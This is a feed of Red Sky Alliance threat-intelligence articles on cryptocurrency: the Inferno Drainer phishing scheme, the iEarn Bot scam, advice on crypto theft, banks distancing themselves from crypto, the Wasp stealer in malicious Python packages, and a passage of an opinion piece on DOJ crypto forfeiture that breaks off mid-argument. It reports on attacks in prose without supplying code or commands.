crypto - X-Industry - Red Sky Alliance2024-03-28T10:37:40Zhttps://redskyalliance.org/xindustry/feed/tag/cryptoWhere did my Crypto Go?https://redskyalliance.org/xindustry/where-did-my-crypto-go2024-01-23T13:00:00.000Z2024-01-23T13:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12364604453,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12364604453,RESIZE_400x{{/staticFileLink}}" width="250" alt="12364604453?profile=RESIZE_400x" /></a>The operators behind the now-defunct <u>Inferno Drainer</u> created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023. The scheme leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers' infrastructure that spoofed Web3 protocols to trick victims into authorizing transactions. A crypto drainer is a malicious tool or script specially designed to transfer or redirect cryptocurrency from a victim’s wallet to that under the control of an attacker. Drainers targeting MetaMask first appeared around 2021, openly marketed in underground forums and marketplaces.</p>
<p>Inferno Drainer, active from November 2022 to November 2023, is estimated to have reaped over $87 million in illicit profits by scamming more than 137,000 victims. The malware is part of a broader set of similar offerings available to affiliates under the Scam-as-a-Service (or Drainer-as-a-Service) model in exchange for a 20% cut of their earnings.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/scam-as-a-service-now-available">https://redskyalliance.org/xindustry/scam-as-a-service-now-available</a></p>
<p>Customers of Inferno Drainer could either upload the malware to their own phishing sites or use the developer's service for creating and hosting phishing websites, either at no extra cost or charging 30% of the stolen assets in some cases. According to investigators, the activity spoofed over 100 cryptocurrency brands via specially crafted pages hosted on over 16,000 unique domains.</p>
<p>An analysis of 500 of these domains has revealed that the JavaScript-based drainer was hosted initially on a GitHub repository (kuzdaz.github[.]io/seaport/seaport.js) before incorporating them directly on the websites. The user "kuzdaz" currently does not exist. Similarly, another set of 350 sites included a JavaScript file, "coinbase-wallet-sdk.js," on a different GitHub repository, "kasrlorcian. github[.]io." These sites were then propagated on sites like Discord and X (formerly Twitter), enticing potential victims into clicking them under the guise of offering free tokens (aka airdrops) and connecting their wallets, at which point their assets are drained once the transactions are approved.</p>
<p>Using the names seaport.js, coinbase.js, and wallet-connect.js, the idea was to masquerade as popular Web3 protocols like Seaport, WalletConnect, and Coinbase to complete the unauthorized transactions. The earliest website containing one of these scripts dates back to 15 May 2023. Another typical feature of phishing websites belonging to Inferno Drainer is that users cannot open website source code by using hotkeys or right-clicking on the mouse. This means that the criminals attempted to hide their scripts and illegal activity from their victims.</p>
<p> The Google-owned Mandiant's X account was compromised earlier this month to distribute links to a phishing page hosting a cryptocurrency drainer tracked as CLINKSINK. “We believe that the ‘X as a service’ model will continue to thrive, not least because it creates greater opportunities for less technically competent individuals from trying their hand at becoming cybercriminals, and for developers, it is a highly profitable way to bolster their revenues,” the company reported. “We also expect to see increased attempts at hacking official accounts, as posts purportedly authored by an authoritative voice are likely to inspire trust in the eyes of viewers and may make potential victims more likely to follow links and connect their accounts.”</p>
<p>The success of Inferno Drainer could fuel the development of new drainers as well as lead to a surge in websites containing malicious scripts spoofing Web3 protocols, noting 2024 could become the “year of the drainer.” Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers develop further.</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html">https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html</a></p></div>iEarn Bot is a Scamhttps://redskyalliance.org/xindustry/batloader-not-from-gotham-city2023-03-30T14:13:22.000Z2023-03-30T14:13:22.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}11004874671,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}11004874671,RESIZE_400x{{/staticFileLink}}" alt="11004874671?profile=RESIZE_400x" width="250" /></a>According to various investigating agencies, thousands are believed to have lost their savings after investing in a cryptocurrency trading app called iEarn Bot <a>https://www.iearnbot.com. </a> DO NOT VISIT THIS WEBSITE; IT IS A SCAM. Experts investigating the company say it could be one of the largest crypto scandals. Cryptocurrency trading has become popular, with people often promising large rewards over short periods. But law enforcement agencies warn of many scams and recommend investors conduct "due diligence."<a href="#_ftn1">[1]</a></p>
<p>Roxana, not her real name, is from Romania. She says she lost hundreds of euros when she invested in iEarn Bot. She asked not to have her identity revealed as she fears her professional reputation might be damaged. Customers buying bots like Roxana were told their investment would be handled by the company's artificial intelligence program, guaranteeing high returns. "I invested in a bot for one month," Roxana tells the BBC. "You could see in the app how many dollars the app was creating: graphics showed how the investment was progressing. "It looked quite professional until, at some point, they announced maintenance." At that point, withdrawals from the app were frozen for some time. "Some people started to say 'I cannot withdraw... what is happening'," explains Roxana. "I made the request to withdraw, and the money just disappeared. The portfolio became zero, but I was never credited to my wallet with any money."</p>
<p>In Romania, dozens of high-profile figures, including government officials and academics, were persuaded to invest via the app because Gabriel Garais, a leading IT expert in the country, sponsored it. Mr. Garais says he was also fooled into investing his savings in the app and lost his money. Roxana insists that had it not been for Garais's sponsorship, she would have never considered investing. "We had the knowledge to think this might be a scam," she says, "but the fact that in between the company and us, there was a reputable teacher meant that we didn't check too much or doubt too much."</p>
<p>What happened in Romania is not an isolated incident. Nor is it unique to Romania.</p>
<p>When Silvia Tabusca, a Romanian organized crime expert from the European Center for Legal Education and Research, began looking into iEarn Bot, she discovered that many people in other countries had also lost their money in the scheme. What surprised her most was the scale of the operation. "From what we have seen, the number of investors is quite high," she says. "In Indonesia, for example, they [iEarn Bot] claim they had 800,000 customers. At first, the app works very well," says Ms. Tabusca. "When they have enough investors and enough money invested in a specific country, they don't allow that country to withdraw anymore - and they open other countries."</p>
<p>iEarn Bot presents itself as a US-based company with excellent credentials, but when the BBC fact-checked some information on its website, it raised some red flags. The man the site names as the company's founder told us he had never heard of them. He said he has made a complaint to the police. The Massachusetts Institute of Technology (MIT), alongside companies such as Huawei and Qualcomm, are all named as "strategic partners" of iEarn Bot. Still, they also said they have no knowledge of the company and are not working with it.</p>
<p>On the website, the company does not provide any contact information. When the BBC checked the history of its Facebook page, we learned that until the end of 2021, the account was advertising weight-loss products. It is managed from Vietnam and Cambodia. iEarn Bot greatly emphasizes pushing investors to recruit more people to join the app. "The way people in this company operate is more similar to a Ponzi scheme than an actual business," says Ms. Tabusca.</p>
<p>The BBC has also seen chat conversations where people, who claim to be from iEarn Bot's customer service, told investors that to withdraw their money, they must pay a 30% fee. "Some people were quite desperate to get their money back, so they paid the fee, but they still couldn't withdraw," says Ms. Tabusca. The BBC has repeatedly approached iEarn Bot for comment, but it has not responded so far.</p>
<p>In some countries, such as Nigeria and Colombia, local leaders were pushed by iEarn Bot mentors, with whom they only ever communicated on Telegram to organize recruiting events.</p>
<p>Andres, from Colombia, said he actively recruited people to join the app. He still believes the company is legitimate. "They had their registration in the US that showed they were legit," he says. "And they were paying." In his country, withdrawals were stopped in December. People were told the company was transforming investment in USDT, a well-established cryptocurrency, into a new coin called iBot, which had the same value. Investors were asked to be patient until March 2023, when the new coin was expected to be officially launched. But people are still waiting to access their money. "[People] took loans to invest. They used money from other sources, and many people were affected," says Andres. "As the local leaders did not have answers, people started to get angry."</p>
<p>With the help of an analyst, the BBC managed to identify one main crypto wallet that received payments from about 13,000 potential victims for a profit of almost $1.3m (£1m) in less than one year. But they could not track down where and to whom the money went. For investigators, this is a common issue. "One of the challenges is to identify and attribute who the illicit actor is, where the value is going, and then being able to take investigative steps and law enforcement action," says Patrick Wyman, chief of the FBI's new Virtual Assets Unit. Investigations in this sort of scheme, he says, go global quickly. Such investigations require international cooperation and may take longer, but he insists those responsible are eventually brought to justice.</p>
<p>The FBI set up the Virtual Assets Unit in 2022 to respond to growing crimes using virtual currencies. It invites people who have been victims of scams to complain on the FBI's dedicated page. But law enforcement agencies maintain the best way to fight scammers remains prevention. "Knowledge and doing some due diligence before the investment it's critical," says Mr. Wyman. "It's like everything else: if it sounds too good to be true, it often is."</p>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office at 1-844-492-7225 or feedback@redskyalliance. com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a> </p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.bbc.com/news/technology-64939146">https://www.bbc.com/news/technology-64939146</a></p></div>Hacking Techniques to Steal Cryptohttps://redskyalliance.org/xindustry/hacking-techniques-to-steal-crypto2023-03-06T16:56:54.000Z2023-03-06T16:56:54.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10993413653,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10993413653,RESIZE_400x{{/staticFileLink}}" width="250" alt="10993413653?profile=RESIZE_400x" /></a>For crypto investors who have not followed the news of thefts, exchange collapses, new government regulations and are prepared to lose their entire investment, here is some advice to follow. <a href="https://www.cnbc.com/2021/06/30/what-do-most-companies-think-when-hackers-demand-ransom-time-to-pay.html">Hackers demand payment in crypto</a>, participate in scams that lead to crypto theft directly, or target crypto trading companies. As an individual with funds in crypto, you are likely to encounter attempts of fraudulent investment schemes, giveaways, phishing attacks, and more mischief.</p>
<p>The “hook” of most investment scams is the promise of incredible financial gain if you send the person in question a certain amount in crypto. While most phishing attempts happen via email, there are also instances of SMS phishing. For example, the recent data breach that occurred <a href="https://www.coinbase.com/blog/social-engineering-a-coinbase-case-study">at the crypto trader Coinbase’s premises</a> started with SMS phishing.</p>
<p> See: <a href="https://redskyalliance.org/xindustry/5-tricks-with-crypto-phishing">https://redskyalliance.org/xindustry/5-tricks-with-crypto-phishing</a></p>
<p> An employee received an SMS that urged them to click on a link and log in using their credentials. With that action, cybercriminals were given all the data they needed to gain illicit access to the company’s systems.</p>
<p>Individuals looking to avoid scams and subsequent crypto theft should:</p>
<ul>
<li>Avoid crypto giveaways, do not open/view them</li>
<li><a href="https://www.finance-monthly.com/2018/06/authentication-is-imperfect-but-passwords-are-not-out/">Update passwords regularly</a> and use 2 factor authentication</li>
<li>Do not link traditional bank and crypto accounts</li>
<li>Know the signs of a scam messages and their time pressure and big promises that sound too good to be true. They are not.</li>
<li>Avoid clicking any links that lead to the login page</li>
<li>Never disclose your key, even if the request seems to be coming from the legitimate trader</li>
</ul>
<p> </p>
<p>The majority of cybercrime is financially motivated, it is common for criminals to demand crypto (which is more difficult to trace) during ransom and extortion attempts. For example, it was recently reported that an Australian citizen attempted to extort an unnamed emergency service for $5 million worth of crypto by threatening to start a bushfire. <a href="https://www.theage.com.au/national/victoria/melbourne-man-accused-of-demanding-crypto-in-bushfire-threat-20230228-p5co2d.html">The service did not meet his demands</a>, and the man was charged as a result.</p>
<p>Ransomware cases (in which cyber criminals lock documents and demand ransom in crypto in exchange for access to files) are increasing and putting affected users and businesses in a difficult situation. Many businesses have paid a ransom to get back access to important files.</p>
<p>While in many countries it is not illegal to pay up to hackers demanding ransom. In the USA, the government is discouraging the payment of any ransoms, regardless of the damage to the victims’ organizations. Making a payment can:</p>
<ul>
<li>Backfire once the public finds out that you have paid the ransom thus affecting your reputation and if PPI was lost/disclosed be subject to litigation.</li>
<li>Give criminals monetary funds for further activity they can do the same to someone else or threaten you again, because they installed a backdoor to your servers.</li>
<li>Go wrong since there is no guarantee that the hacker will give you access to your system</li>
</ul>
<p> Any company with critical flaws that are not patched is open to possible hacking exploitations. Zero day threats are on the increase too. For example, a Trojan dubbed Parallax RAT has been discovered recently. The operator’s main target is cryptocurrency firms. As with any other Trojan malware, this one hides in different documents to sneak in the “gift horse” to targeted devices. This malicious software (AKA malware) can record keystrokes and take screenshots. This means that it can remember the password and username that a victim types in, as well as the key used for the account.</p>
<p>Users do not have a lot of power when it comes to fighting such advanced attacks. Crypto trading companies are responsible for securing assets as well as protecting their clients.</p>
<p>Be careful when you choose a crypto company. Check if they are reputable and whether they have already experienced major cybersecurity incidents in the past. Pay attention to how they resolved the issue and communicated with the public about the data breach. Advanced black hat (illegal) hackers and hacking groups typically go after companies that already have strong security, multiple solutions, and teams to manage it. But can they handle more sophisticated techniques such as Parallax RAT?</p>
<p>How can businesses defend against cyberattacks:</p>
<ul>
<li>Setting up layered security</li>
<li>Testing the existing security solutions</li>
<li>Strengthening the security daily</li>
<li>Education and training for all employees</li>
</ul>
<p>A data breach that compromises crypto wallets could be prevented if the company has multiple security points and protocols that cover the complete attack surface (any software and device that could be attacked). Besides setting up a strong defense strategy, it is vital to continually improve it with<a href="https://cymulate.com/breach-and-attack-simulation"> tools such as automated breach and attack simulation</a> that test the security an organization has in real-time.</p>
<p>Today, cryptocurrency firms are up against more damaging and dangerous threats than ever before from new versions of viruses that can get into the system undetected to persistent phishing attacks. The method on which the hackers rely the most is social engineering. Phishing is also the technique that individual users can do most about.</p>
<p>On a personal level, learning how to recognize scam emails, avoiding links designed to collect your sensitive data, and choosing a trusted crypto entity can save you a lot of money in the long run.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p> </p>
<p><br /> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br /> LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p><a href="{{#staticFileLink}}10993413694,original{{/staticFileLink}}">TR-23-66-001.pdf</a> </p></div>US Banks Are Breaking Up with Cryptohttps://redskyalliance.org/xindustry/us-banks-are-breaking-up-with-crypto2023-02-20T15:35:10.000Z2023-02-20T15:35:10.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10970241056,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10970241056,RESIZE_400x{{/staticFileLink}}" width="250" alt="10970241056?profile=RESIZE_400x" /></a>US banks are backing away from crypto companies, concerned by a regulatory crackdown that threatens to sever digital currencies from the real-world financial system. Banking regulators are raising concerns about banks’ involvement with crypto clients following last year’s blowup of Sam Bankman-Fried’s FTX. The Securities and Exchange Commission is aggressively pursuing the industry’s bigger players in a crackdown that threatens to narrow their reach. That move has alarmed bankers who don’t want to do business with customers in the SEC’s crosshairs, people familiar with the matter said.<a href="#_ftn1">[1]</a></p>
<p>According to people familiar with the industry, bankers are now re-evaluating any exposure to the crypto sector, no matter how small. The few smaller banks that got deep into crypto are reducing their exposure to the market or cutting ties altogether. Banks that kept their distance from crypto are trying even harder to stay away, closing accounts and shunning customers with potential connections to the industry.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/what-is-the-future-of-cryptocurrency">https://redskyalliance.org/xindustry/what-is-the-future-of-cryptocurrency</a></p>
<p>New York’s Metropolitan Commercial Bank recently announced closing its crypto business, citing material changes in the regulatory environment. Signature Bank cut ties with the international business of Binance, the biggest crypto exchange. One of crypto’s leading banks, the lender started paring back its relationships with crypto depositors late last year.</p>
<p>The crackdown is squeezing crypto businesses. While the industry often pitched itself as an alternative to banks, these firms still rely heavily on banks to link up with a financial system that runs on hard currencies such as dollars and euros. Without banks, crypto companies struggle to pay their employees and enable customers to move money in and out of digital currencies.</p>
<p>When bitcoin first gained popularity years ago, it was difficult for crypto firms to open bank accounts. A handful of smaller lenders, struggling to compete with big banks for deposit dollars, opened their doors, often banking only the bigger crypto players they thought were safest. These banks don’t hold digital currencies. Instead, they provide corporate accounts for crypto companies. Some, such as Silvergate Capital Corp., also built special networks to enable transfers between big investors and crypto exchanges.</p>
<p>For a time, banking regulators warmed to crypto activities. In 2020, the Office of the Comptroller of the Currency said it would allow banks to hold cryptocurrencies for customers. Regulators reversed course following the FTX meltdown. In January, the three major banking regulators warned banks that they were concerned about their crypto ties. The regulators said they had “significant safety and soundness concerns” and questioned if the industry could be safely banked.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/sec-chairman-pushes-for-more-cryptocurrency-regulations">https://redskyalliance.org/xindustry/sec-chairman-pushes-for-more-cryptocurrency-regulations</a></p>
<p>“That was a red flare that basically says, ‘Banks, if you’re going to be anywhere near the crypto business, we’re going to be looking at you very carefully,’” said Thomas Vartanian, executive director of the Financial Technology and Cybersecurity Center. “At the end of the day, banks will have to ask themselves if it’s worth the aggravation.”</p>
<p>Regulators generally do not tell banks that they cannot do business with customers operating legitimate businesses. Instead, they categorize customers as higher risk through formal public statements reinforced by feedback from the examiners who burrow into their operations to ensure they are not taking undue risks. Banks often then decide these customers aren’t worth the regulatory headache and cut them off.</p>
<p>Citigroup Inc. abruptly closed Swan Bitcoin’s account in November 2022, said Cory Klippsten, chief executive of the bitcoin trading platform, forcing him to scramble to pay his 100 employees. He said that Citigroup investment bankers who had been pitching to work with him tried to intervene but were unsuccessful. Soon afterward, Mr. Klippsten said, his accounts at Citigroup were closed, too. He said he was never explained.</p>
<p>Matthew Homer, a former regulator now advising and investing in crypto firms, said his clients are having difficulty landing bank accounts. A First Republic representative told Mr. Homer the bank avoids crypto-related companies. Mercury, a banking service for startups, asks if a business is related to crypto in the sign-up process, Mr. Homer said. A spokesman for Mercury said it conducts more due diligence on these businesses because of regulatory uncertainty. A representative for First Republic declined to comment.</p>
<p>Signature is the highest-profile bank to retreat from the crypto market. In early 2022, 27% of its $109 billion deposits were from its digital-asset clients. Last year, the bank announced plans to pare back the share of deposits from the crypto business to less than 15% and to cap the number of deposits from any individual crypto customer. Regulators didn’t tell them to back away, but the bank felt they “agreed with what we were doing,” Chief Executive Joe DePaolo said. Bank officers said they don’t regret getting into crypto, even if they now spend much time reassuring their customers in other industries about their exposure. They believe the blockchain technology behind the payments network popular with crypto customers is relevant to companies such as payroll providers and cargo shippers.</p>
<p>Some banks, meanwhile, are sticking with crypto. Silvergate went all-in on crypto and does not have the same revenue sources as Signature. It lost the bulk of its crypto deposits in a run on the bank last quarter and is cutting jobs and shrinking its business to lower costs. Silvergate said it remains committed to serving crypto companies.</p>
<p>Two companies trying to win banking licenses have been left in limbo after winning preliminary approval in early 2021 from the OCC. Paxos National Trust and Protego Trust Co. applied to start banks that would hold crypto assets for clients and facilitate trading. Protego’s conditional charter expired recently. Paxos said on Twitter that it continues to “work constructively with the OCC.” </p>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a> </p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.wsj.com/articles/banks-are-breaking-up-with-crypto-during-regulatory-crackdown-22de1832">https://www.wsj.com/articles/banks-are-breaking-up-with-crypto-during-regulatory-crackdown-22de1832</a></p></div>'Wasp' Stealer Delivers a Stinging Messagehttps://redskyalliance.org/xindustry/wasp-stealer-delivers-a-stinging-message2022-11-22T15:53:54.000Z2022-11-22T15:53:54.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><strong><a href="{{#staticFileLink}}10889538276,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10889538276,RESIZE_400x{{/staticFileLink}}" width="217" alt="10889538276?profile=RESIZE_400x" /></a></strong>Security researchers are alerting about an ongoing supply chain attack that uses malicious Python packages to distribute an information stealer. The attackers have been active since October 2022. The <a href="https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack">attack was uncovered</a> by investigators on 01 November 2022, with the attackers copying existing popular libraries and injecting a malicious ‘import’ statement into them. The purpose of the injected code is to infect the victim’s machine with a script that runs in the background. The script, which fetches the victim’s geolocation, contains a modified version of an information stealer called Wasp.</p>
<p>The attackers have managed to infect hundreds of victims to date, while actively releasing new packages to continue the campaign. Steganography is used to hide the malicious code inside packages. The payload is polymorphic, meaning that different code results each time the second and third stage URLs are loaded, which helps evade detection and ensures persistence.</p>
<p>Steganography is the practice of representing information within another message or physical object, in such a manner that the presence of the information is not evident to human inspection. In computing/electronic contexts, a <a href="https://en.wikipedia.org/wiki/Computer_file">computer file</a>, message, image, or video is concealed within another file, message, image, or video.</p>
<p><a href="https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192">The Wasp malware can steal</a> a great deal of information from victims’ machines, including Discord account information, passwords, credit card data, crypto wallets, and local files. WASP is an info-stealing malware that steals all the victim’s Discord accounts, passwords, crypto wallets, credit cards, and other interesting files on the victim’s PC. It sends the stolen data back to the attacker through a hard-coded Discord webhook address. WASPoperators claim that it is fully undetectable.</p>
<p>The threat actor behind these attacks is offering their malware on cybercrime forums, claiming the code is fully undetected. Researchers were able to link Wasp’s author to a Steam account and to a YouTube channel containing videos on building Discord hacking tools. Since the beginning of the campaign, the attacker has created tens of new Python packages and numerous fake user accounts that mimic legitimate libraries and accounts.</p>
<p>The level of manipulation used by software supply chain attackers is increasing as attackers get even more experience. It seems this attack is ongoing, and whenever the security team of Python deletes his packages, he quickly maneuvers and creates a new identity or simply uses a different name.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br />LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p> </p>
<p><a href="{{#staticFileLink}}10889538863,original{{/staticFileLink}}">TR-22-326-001.pdf</a></p>
<p> </p>
<p> </p>
<p><span style="font-size:8pt;"><a href="https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack">https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack</a></span></p>
<p> </p></div>Biden Administration Wants to Ignore the 4th Amendment of the US Constitutionhttps://redskyalliance.org/xindustry/biden-administration-wants-to-ignore-the-4th-amendment-of-the-us-2022-10-31T21:19:29.000Z2022-10-31T21:19:29.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10859343060,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10859343060,RESIZE_400x{{/staticFileLink}}" width="275" alt="10859343060?profile=RESIZE_400x" /></a>Researchers found buried deep in a 61-page recent <a href="https://www.justice.gov/ag/page/file/1535236/download">report</a> by the U.S. Attorney General, the Biden Administration called for a dramatic expansion in the federal government’s ability to seize and keep cryptocurrency. If enacted, the proposed changes would bolster both criminal forfeiture, which requires a conviction to permanently confiscate property, as well as civil forfeiture, which does not require a conviction or even criminal charges to be filed. Notably, the report’s release was coupled with the <a href="https://www.justice.gov/opa/pr/justice-department-announces-report-digital-assets-and-launches-nationwide-network">announcement</a> of a new Digital Asset Coordinator Network. This nationwide network is staffed with more than 150 federal prosecutors who will be trained on “drafting civil and criminal forfeiture actions.”</p>
<p>The 4<sup>th</sup> Amendment to the US Constitution: </p>
<p>“The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things.”</p>
<p>Due to crypto’s pseudonymous nature, it is sometimes assumed to be immune from government confiscation. But the reality is quite different. During 2021, the U.S. Marshals the custodians for Justice Department seizures <a href="https://oig.justice.gov/reports/audit-united-states-marshals-services-management-seized-cryptocurrency">managed</a> almost 200 cryptocurrency seizures worth $466 million. Since fiscal 2014, the FBI, Secret Service, and Homeland Security Investigations have collectively <a href="https://www.justice.gov/ag/page/file/1535236/download">seized</a> almost $680 million worth of crypto (valued at the time of seizure), with hundreds of still active investigations involving digital assets. But even those amounts pale in comparison to IRS Criminal Investigation, which has <a href="https://www.hassan.senate.gov/imo/media/doc/crypto.pdf">confiscated</a> a staggering $3.8 billion in virtual currency between fiscal 2018 and 2021.</p>
<p>The Justice Department argued that crypto has “revealed limits on the forfeiture tools used” by federal law enforcement and recommended “several updates to existing law.” First, the Attorney General wants to broaden the most abusive form of civil forfeiture, which occurs without any independent or impartial judicial oversight.</p>
<p>Under “administrative” or “nonjudicial” forfeiture, the seizing agency not a judge decides whether a property should be forfeited. The federal government can use administrative forfeiture to take almost anything, aside from real estate and property valued at more than $500,000. That $500,000 limit currently applies to cryptocurrency, but the Attorney General wants to “lift the $500,000 cap for cryptocurrency and other digital assets.” This would eliminate one of the very few limits on administrative forfeiture. Even if Congress refuses to act, thanks to a law enacted last year, the Secretary of the Treasury could simply end the cap by adopting new regulation.</p>
<p>This proposal is deeply concerning. Administrative forfeiture provides shockingly scant protection for property owners. After seizing property, the government need only send notice of an administrative forfeiture. If an owner fails to quickly file a claim for their own property, it is automatically forfeited.</p>
<p>Since the seized property may be the owner’s most valuable asset, owners often do not have the means to fight back. Yet even when a claim is filed, the owner still might not get their day in court. According to a <a href="https://ij.org/report/policing-for-profit-3/">report</a> by the Institute for Justice, federal agencies have rejected more than one-third of all filed claims for seized cash as “deficient,” with most claims denied due to “technical reasons.” Unsurprisingly, since administrative forfeiture cases are significantly easier for the government to win, administrative forfeitures accounted for almost 80% of all forfeitures conducted by the Department of Justice and 96% of the Treasury Department’s forfeiture activity.</p>
<p>The Justice Department praises administrative forfeiture for being “efficient” and for reducing “undue burdens” in the court system, in reality, administrative forfeiture has burdened the lives of thousands of victims who have done nothing wrong.</p>
<p>Here is an example an average forfeiture: <a href="https://ij.org/case/structuring-petition/">Ken Quran</a>, after coming to America from the Middle East, he opened a small convenience store in Greenville, North Carolina. But in June 2014, IRS agents barged into his store and told Ken they had a warrant to seize $570,000 and had already seized every penny in his bank account $153,907.99. That money was Ken’s entire life savings, earned over nearly 20 years of long hours running his business. Less than three months later, Ken’s bank account was administratively forfeited. Without those savings, Ken was driven to the financial breaking point. He struggled to support his family, pay off his mortgage, and cover a line of credit he had to take out to keep his store afloat. Ken was never charged with a crime.</p>
<p>“I never believed this could happen in America,” Ken lamented. “I do not understand how, in this country, the government can take an honest businessman’s entire bank account without proving that he did something wrong.”</p>
<p>Fortunately, with help from the Institute for Justice, Ken later <a href="https://ij.org/wp-content/uploads/2015/07/irs-forfeiture-petitions-ken-quran-petition.pdf">filed</a> a “petition for remission or mitigation” (basically a pardon for forfeited property). After a media firestorm, in February 2016, the IRS agreed to return all of the money they had wrongfully taken from Ken. Although he lost fiat currency rather than crypto, as Ken’s story shows, there is absolutely no need to make administrative forfeiture easier to use.</p>
<p>In addition to expanding administrative forfeiture for crypto, the Justice Department “would welcome amendments to provide criminal and civil forfeiture authority for commodities-related violations.” Allowing criminal forfeiture after a conviction for fraud or manipulation in crypto markets would be a valuable tool to crack down on scammers.</p>
<p>Currently, most cryptocurrencies are <a href="https://www.washingtonpost.com/business/why-the-crypto-world-flinches-when-the-sec-calls-coins-securities/2022/09/22/cd4118fc-3a2b-11ed-b8af-0a04e5dc3db6_story.html">considered</a> commodities rather than securities. So under federal laws governing commodities, prosecutors can “charge fraud and manipulation in the cryptocurrency markets.” But unlike securities, those statutes “do not permit forfeiture of ill-gotten gains from criminal activity involving commodities.”</p>
